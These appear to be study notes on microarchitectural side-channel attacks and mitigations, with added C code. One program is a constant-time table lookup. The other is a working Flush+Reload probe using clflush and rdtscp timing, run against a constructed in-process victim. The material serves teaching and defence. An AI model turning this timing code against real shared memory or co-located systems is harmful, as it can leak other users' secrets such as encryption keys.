My notes:
Microarchitectural Attacks
By making indirect observations of a victim (its timing, its effect on shared resources), an attacker infers partial information about the victim's secrets.
According to the system's semantics no communication between the two should be possible: the medium (a shared cache, a branch predictor, ...) was not designed to be a communication channel, which is exactly why it is not isolated like one.
Micro-architectural events that can be observed: timing differences, performance counters, etc.
Mitigations:
- Data-oblivious execution and constant-time programming: no secret-dependent memory addresses, branches or variable-latency instructions, so there is nothing to observe.
- Partitioning: give attacker and victim disjoint resources (e.g. cache partitioning, no shared pages), so there is no shared channel at all.
- Add noise: this only makes the channel less reliable; the attacker compensates with repetition and statistics, so it raises the cost rather than removing the channel.
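Worked example of the first mitigation, added here as my own code (not from the notes): a secret-indexed table lookup next to a data-oblivious version of the same lookup. The table (a constructed stand-in for an S-box) and the names lookup_leaky, lookup_ct, ct_eq_mask and lookups_agree are my own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Leaky lookup: the load address depends on the secret, so the cache line it
 * touches (and, with Flush+Reload or Prime+Probe, roughly which entry) is
 * observable by another process sharing the cache. */
uint8_t lookup_leaky(const uint8_t *t, size_t n, size_t secret)
{
    (void)n;
    return t[secret];
}

/* Branch-free mask: 0xFF if a == b, else 0x00.
 * x = a ^ b is zero iff a == b, and (x | -x) has its top bit set iff x != 0. */
static uint8_t ct_eq_mask(size_t a, size_t b)
{
    size_t x = a ^ b;
    size_t nonzero = (x | (0 - x)) >> (sizeof(size_t) * 8 - 1); /* 1 iff a != b */
    return (uint8_t)(nonzero - 1);                               /* 0xFF iff a == b */
}

/* Data-oblivious lookup: touches every entry in the same order whatever the
 * secret is and selects the wanted one with a mask. The memory trace and the
 * branch pattern no longer depend on the secret; the cost is O(n) instead of O(1). */
uint8_t lookup_ct(const uint8_t *t, size_t n, size_t secret)
{
    uint8_t result = 0;
    for (size_t i = 0; i < n; i++)
        result |= t[i] & ct_eq_mask(i, secret);
    return result;
}

/* Functional check: 1 if both lookups agree on every index of t. */
int lookups_agree(const uint8_t *t, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (lookup_ct(t, n, i) != lookup_leaky(t, n, i))
            return 0;
    return 1;
}

int main(void)
{
    /* Constructed stand-in for an S-box: 256 entries spanning 4 cache lines. */
    uint8_t sbox[256];
    for (size_t i = 0; i < 256; i++)
        sbox[i] = (uint8_t)(i * 167 + 13);
    printf("lookups agree on all indices: %d\n", lookups_agree(sbox, 256));
    printf("entry 0x2a: leaky %u, constant-time %u\n",
           lookup_leaky(sbox, 256, 0x2a), lookup_ct(sbox, 256, 0x2a));
    return 0;
}
```

Two caveats a practitioner should keep in mind: the compiler is free to turn the mask back into a branch or a conditional move, so the generated assembly has to be checked, not just the C; and the scan still reveals that the table was used, only no longer which entry.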
Cache attacks
- Flush+Reload: needs memory shared with the victim. The flush instruction (clflush on x86) exists for legitimate reasons such as writing lines back to persistent memory or keeping non-coherent devices consistent, but it gives the attacker explicit control of the cache state. The attacker flushes the shared line, lets the victim execute, then reloads it: if the reload is fast, the victim accessed that cache line.
- Evict+Reload: same idea when no flush instruction is available to the attacker (e.g. from a browser). Instead of flushing, the attacker accesses enough addresses mapping to the same cache set to evict the shared line, then reloads and times it as above.
- Prime+Probe: works without shared memory. The attacker fills (primes) a cache set with their own lines, lets the victim execute, then probes by re-accessing those lines: a slow access means the victim evicted it, i.e. the victim touched that set.
Cache attacks are hard in practice: Flush+Reload needs shared memory, prefetchers add noise, the attacker does not know the virtual-to-physical mapping (and therefore which cache set an address falls into), the replacement policy is undocumented, etc.
Hardware and software optimizations make attacks easier: transparent page sharing (memory deduplication) creates shared memory between unrelated processes or VMs, copy-on-write keeps pages shared until they are written, huge pages expose more physical address bits (hence the set index) to the attacker, and virtually-indexed, physically-tagged caches let the attacker pick a set from the virtual address alone.
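Added example of one Flush+Reload round, my own code rather than anything from the notes: a page buffer stands in for the memory shared between attacker and victim (a shared library page or a deduplicated page), a constructed victim() touches one line of it only when its secret bit is set, and the attacker calibrates the hit/miss threshold at run time instead of hard-coding one. Assumes x86-64 with GCC or Clang (rdtscp, clflush); shared_page, victim, calibrate, probe and inferred_access_rate are all names introduced here.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <x86intrin.h>

#define TRIALS 1000

/* Constructed stand-in for a page both parties have mapped (shared library
 * page, or a page merged by memory deduplication): one physical frame, hence
 * one set of cache lines visible to both. */
static uint8_t shared_page[4096] __attribute__((aligned(4096)));

/* Load one byte and return the elapsed cycles. rdtscp waits for all earlier
 * instructions, so the load sits inside the measured window. */
static uint64_t time_access(const uint8_t *addr)
{
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    volatile uint8_t sink = *(const volatile uint8_t *)addr;
    (void)sink;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* Flush phase: puts the shared line into a known, uncached state. */
static void flush_line(const void *addr)
{
    _mm_clflush(addr);
    _mm_mfence();
}

/* Hypothetical victim: touches line 0 of the shared page only when the secret
 * bit is set (think of a secret-dependent table lookup). */
static void victim(int secret_bit)
{
    if (secret_bit) {
        volatile uint8_t sink = *(volatile uint8_t *)shared_page;
        (void)sink;
    }
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Calibrate on this machine: fastest cached reload vs. median uncached reload.
 * Returns the midpoint as the hit/miss threshold. */
static uint64_t calibrate(uint64_t *hit_min, uint64_t *miss_median)
{
    static uint64_t miss[TRIALS];
    *hit_min = UINT64_MAX;
    for (int i = 0; i < TRIALS; i++) {
        victim(1);                              /* line is cached */
        uint64_t t = time_access(shared_page);
        if (t < *hit_min) *hit_min = t;
    }
    for (int i = 0; i < TRIALS; i++) {
        flush_line(shared_page);                /* line is uncached */
        miss[i] = time_access(shared_page);
    }
    qsort(miss, TRIALS, sizeof miss[0], cmp_u64);
    *miss_median = miss[TRIALS / 2];
    return (*hit_min + *miss_median) / 2;
}

/* Decision rule for a single reload measurement. */
static int is_hit(uint64_t cycles, uint64_t threshold)
{
    return cycles < threshold;
}

/* One Flush+Reload round: flush, let the victim run, reload and classify.
 * Returns 1 if the attacker concludes that the victim touched the line. */
static int probe(int secret_bit, uint64_t threshold)
{
    flush_line(shared_page);
    victim(secret_bit);
    return is_hit(time_access(shared_page), threshold);
}

/* Fraction of rounds classified as "victim accessed the line". */
static double inferred_access_rate(int secret_bit, uint64_t threshold, int rounds)
{
    int hits = 0;
    for (int i = 0; i < rounds; i++)
        hits += probe(secret_bit, threshold);
    return (double)hits / rounds;
}

int main(void)
{
    uint64_t hit_min, miss_median;
    uint64_t thr = calibrate(&hit_min, &miss_median);
    printf("cached reload min %llu cycles, uncached reload median %llu, threshold %llu\n",
           (unsigned long long)hit_min, (unsigned long long)miss_median,
           (unsigned long long)thr);
    printf("secret bit 1: inferred access in %.0f%% of rounds\n",
           100.0 * inferred_access_rate(1, thr, 500));
    printf("secret bit 0: inferred access in %.0f%% of rounds\n",
           100.0 * inferred_access_rate(0, thr, 500));
    return 0;
}
```

On real hardware the two rates come out close to 100% and 0%; the gap narrows under the noise sources listed above (prefetchers, interrupts, a busy core), which is why a real attack repeats the round and why the threshold is calibrated rather than assumed. Evict+Reload differs only in flush_line: instead of clflush, the attacker walks a set of addresses congruent with the target line until it is evicted.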